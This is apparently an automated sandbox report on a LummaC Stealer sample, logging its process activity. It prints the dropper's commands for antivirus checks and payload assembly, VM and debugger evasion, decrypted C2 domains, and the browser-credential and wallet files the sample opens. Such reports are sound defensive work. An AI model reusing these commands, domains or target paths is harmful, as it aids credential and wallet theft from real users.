Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2303			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1090			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

API coverage: 3.9 %

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com TID: 7944	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 2303 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 1090 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_003EDC54
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_003FA087
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_003FA1E2
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_003EE472
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_003FA570
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003BC622 FindFirstFileExW,	10_2_003BC622
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F66DC FindFirstFileW,FindNextFileW,FindClose,	10_2_003F66DC
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F7333 FindFirstFileW,FindClose,	10_2_003F7333
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_003F73D4
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_003ED921

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_00385FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00385FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\600044	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\600044\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003FF4FF BlockInput,

10_2_003FF4FF

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_0038338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_0038338B

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003A5058 mov eax, dword ptr fs:[00000030h]

10_2_003A5058

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003E20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

10_2_003E20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003B2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_003B2992
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_003A0BAF
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A0D45 SetUnhandledExceptionFilter,	10_2_003A0D45
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_003A0F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: debonairnukk.xyz
Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: diffuculttan.xyz
Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: effecterectz.xyz
Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: deafeninggeh.biz
Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immureprech.biz
Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kitteprincv.click

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

10_2_003E1B4D

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_0038338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_0038338B

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003EBBED SendInput,keybd_event,

10_2_003EBBED

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003EEC6C mouse_event,

10_2_003EEC6C

Source: C:\Users\user\Desktop\Full-Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003E14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_003E14AE

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003E1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_003E1FB0

Source: Glow.com, 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F25000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Encyclopedia.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Glow.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003A0A08 cpuid

10_2_003A0A08

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003DE5F4 GetLocalTime,

10_2_003DE5F4

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003DE652 GetUserNameW,

10_2_003DE652

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003BBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

10_2_003BBCD2

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
